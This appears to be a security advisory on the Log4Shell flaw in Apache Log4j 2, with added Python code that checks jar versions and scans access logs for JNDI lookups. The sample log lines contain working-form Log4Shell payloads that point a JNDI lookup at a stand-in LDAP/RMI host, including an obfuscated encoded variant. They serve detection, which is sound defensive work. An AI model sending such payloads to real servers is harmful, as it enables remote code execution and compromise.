Executive Summary
CVE-2021-44228, commonly referred to as Log4Shell, is a critical remote code execution (RCE) vulnerability in the widely used Apache Log4j 2 library. This vulnerability, which has a CVSS score of 10.0, allows attackers to execute arbitrary code on a server by manipulating log messages or log message parameters. The vulnerability has been actively exploited in the wild, affecting numerous sectors globally, including technology, finance, healthcare, and government. The impact of this vulnerability is far-reaching, with potential consequences including data breaches, ransomware attacks, and unauthorized access to sensitive information.
Technical Information
CVE-2021-44228 affects Apache Log4j2 versions 2.0-beta9 through 2.15.0, excluding security releases 2.12.2, 2.12.3, and 2.3.1. The vulnerability arises from the JNDI features used in configuration, log messages, and parameters, which do not protect against attacker-controlled LDAP and other JNDI-related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.
The vulnerability is particularly dangerous because it requires minimal effort to exploit. An attacker can simply send a specially crafted string to a vulnerable application, which then logs the string using Log4j. The string triggers a JNDI lookup to an attacker-controlled server, which responds with malicious code that the vulnerable application then loads and executes. This can lead to complete system compromise, data exfiltration, and further lateral movement within the network.
The severity of this vulnerability is underscored by its CVSS score of 10.0, indicating the highest level of criticality. The attack vector is network-based, with low attack complexity, no privileges required, and no user interaction needed. The scope of the impact is extensive, affecting confidentiality, integrity, and availability.
Exploitation in the Wild
Since its disclosure, the Log4Shell vulnerability has been actively exploited by threat actors. Attackers have leveraged this vulnerability to deploy various types of malware, including ransomware, cryptominers, and botnets. Notable incidents include the exploitation of VMware vCenter Server, UniFi Network Application, and AD Manager Plus for unauthenticated remote code execution.
In one instance, attackers used the vulnerability to deploy the Conti ransomware, leading to significant disruptions in affected organizations. In another case, the Kinsing malware was deployed to mine cryptocurrency on compromised servers. Additionally, the Mirai botnet was observed exploiting the vulnerability to recruit new devices into its network.
Indicators of Compromise (IOCs) associated with these attacks include unusual outbound network traffic to unfamiliar domains, the presence of unexpected processes or services, and the detection of known malware signatures. Organizations are advised to monitor their networks for these IOCs and take immediate action if any are detected.
APT Groups using this vulnerability
Several Advanced Persistent Threat (APT) groups have been observed exploiting the Log4Shell vulnerability. These groups target a wide range of sectors, including technology, finance, healthcare, and government, across various countries. Notable APT groups include:
APT41: Known for its sophisticated cyber espionage campaigns, APT41 has been observed exploiting Log4Shell to gain unauthorized access to sensitive information and deploy malware.
FIN12: This financially motivated group has leveraged the vulnerability to deploy ransomware and extort affected organizations.
Lazarus Group: Associated with North Korea, the Lazarus Group has used Log4Shell to conduct cyber espionage and financial theft.
Cobalt Strike: While not an APT group, the Cobalt Strike tool has been widely used by various threat actors to exploit Log4Shell and conduct post-exploitation activities.
Affected Product Versions
The following product versions are affected by CVE-2021-44228:
Apache Log4j2: Versions 2.0-beta9 to 2.15.0 (excluding 2.12.2, 2.12.3, and 2.3.1)
VMware vCenter Server: Versions prior to the patched release
UniFi Network Application: Versions prior to the patched release
AD Manager Plus: Versions prior to the patched release
Organizations using these products are strongly advised to update to the latest versions to mitigate the risk of exploitation.
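As an added example (not part of this advisory, nor Apache's or any scanner project's code), the following Python classifies a Log4j 2 version string against the affected range stated above and reads that version out of a log4j-core jar; it assumes, as is the case for Maven-built log4j-core jars, that META-INF/MANIFEST.MF carries an Implementation-Version entry, and the sample jar is constructed in memory.

```python
"""Check a Log4j 2 version against the CVE-2021-44228 affected range
(2.0-beta9 through 2.15.0, excluding backports 2.12.2, 2.12.3, 2.3.1).
Added example; not Apache's or any scanner project's code."""
import io
import re
import zipfile

SAFE_BACKPORTS = {"2.12.2", "2.12.3", "2.3.1"}
VERSION_RE = re.compile(r"(\d+)\.(\d+)(?:\.(\d+))?(?:-(beta|rc)(\d+))?")

def parse_version(v):
    """Turn '2.0-beta9' or '2.14.1' into a sortable tuple. Pre-releases rank
    below the final release of the same number: 2.0-beta9 < 2.0-rc1 < 2.0."""
    m = VERSION_RE.fullmatch(v.strip())
    if not m:
        raise ValueError(f"unrecognised Log4j version: {v!r}")
    release = (int(m.group(1)), int(m.group(2)), int(m.group(3) or 0))
    if m.group(4):
        return release + (0, {"beta": 0, "rc": 1}[m.group(4)], int(m.group(5)))
    return release + (1, 0, 0)

def is_affected(version):
    """True when the version is inside the affected range and not a backport fix."""
    if version.strip() in SAFE_BACKPORTS:
        return False
    return parse_version("2.0-beta9") <= parse_version(version) <= parse_version("2.15.0")

def manifest_version(jar_bytes):
    """Return Implementation-Version from META-INF/MANIFEST.MF, or None.
    Assumption: the jar was built by Maven and records its version there."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        if "META-INF/MANIFEST.MF" not in zf.namelist():
            return None
        manifest = zf.read("META-INF/MANIFEST.MF").decode("utf-8", "replace")
    for line in manifest.splitlines():
        key, _, value = line.partition(":")
        if key.strip() == "Implementation-Version":
            return value.strip()
    return None

def build_sample_jar(version):
    """Constructed stand-in for log4j-core-<version>.jar; only the manifest matters."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\n"
                    f"Implementation-Title: Apache Log4j Core\nImplementation-Version: {version}\n")
    return buf.getvalue()
```

A real inventory run would walk the classpath and call manifest_version on every jar, including jars nested inside WAR and EAR archives.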
Workaround and Mitigation
To mitigate the risk posed by CVE-2021-44228, organizations should take the following steps:
Update to the latest version of Apache Log4j2. Versions 2.16.0 and later have addressed the vulnerability by disabling JNDI lookups by default.
Apply patches provided by vendors for affected products, such as VMware vCenter Server, UniFi Network Application, and AD Manager Plus.
Implement network segmentation to limit the exposure of vulnerable systems to the internet and restrict outbound network traffic to known, trusted domains.
Monitor network traffic for indicators of compromise (IOCs) associated with Log4Shell exploitation, such as unusual outbound connections and the presence of known malware signatures.
Consider using web application firewalls (WAFs) to block malicious payloads targeting the Log4Shell vulnerability.
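The IOC monitoring and WAF steps above come down to recognising the lookup string in logged request data. As an added example (not code from this advisory), the following Python scans access-log lines for a JNDI lookup after flattening the nested lookups Log4j itself would resolve first, so a lookup hidden inside ${lower:...} or URL-encoding is still caught; the log lines and addresses are constructed.

```python
"""Flag web-server log lines carrying a Log4j JNDI lookup, after flattening
the nested lookups Log4j would evaluate first. Added example, not code from
this advisory; the log lines below are constructed."""
import re
from urllib.parse import unquote

# Innermost ${...} (no further '${' inside); Log4j resolves these first.
INNER = re.compile(r"\$\{([^${}]*)\}")
# After flattening, a jndi lookup naming a remote scheme is the signal.
JNDI = re.compile(r"(?i)\$\{jndi\s*:\s*(ldap|rmi|dns|iiop|corba|nds|http)s?://")

def resolve_inner(m):
    """One innermost lookup, as Log4j would substitute it: ${x:-default} gives
    the default, ${lower:X}/${upper:x} change case, others keep their body."""
    body = m.group(1)
    prefix, sep, rest = body.partition(":")
    if prefix.lower() == "jndi":
        return m.group(0)  # keep the lookup we are scanning for
    if ":-" in body:
        return body.split(":-", 1)[1]
    if prefix.lower() == "lower":
        return rest.lower()
    if prefix.lower() == "upper":
        return rest.upper()
    return rest if sep else body

def normalize(text, max_rounds=20):
    """URL-decode (twice, for double encoding), then flatten lookups inside-out."""
    text = unquote(unquote(text))
    for _ in range(max_rounds):
        flattened = INNER.sub(resolve_inner, text)
        if flattened == text:
            break
        text = flattened
    return text

def scan(lines):
    hits = []  # (line_number, normalized_line) for every line with a JNDI lookup
    for n, line in enumerate(lines, 1):
        norm = normalize(line)
        if JNDI.search(norm):
            hits.append((n, norm))
    return hits

SAMPLE_LOG = [  # constructed access-log lines, RFC 5737 documentation addresses
    '198.51.100.7 - - [10/Dec/2021:10:01:22 +0000] "GET / HTTP/1.1" 200 612 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Dec/2021:10:01:23 +0000] "GET / HTTP/1.1" 200 612 "-" "${jndi:ldap://203.0.113.5:1389/a}"',
    '198.51.100.7 - - [10/Dec/2021:10:01:24 +0000] "GET /?q=%24%7B%24%7Blower%3Aj%7Dndi%3Armi%3A%2F%2F203.0.113.5%3A1099%2Fb%7D HTTP/1.1" 404 0 "-" "curl/7.79"',
    '198.51.100.7 - - [10/Dec/2021:10:01:25 +0000] "GET /docs/${date:yyyy} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]
```

Only lines 2 and 3 are reported; the benign ${date:...} lookup on line 4 is flattened away and not flagged, which is the false-positive case a naive substring match would get wrong in the other direction.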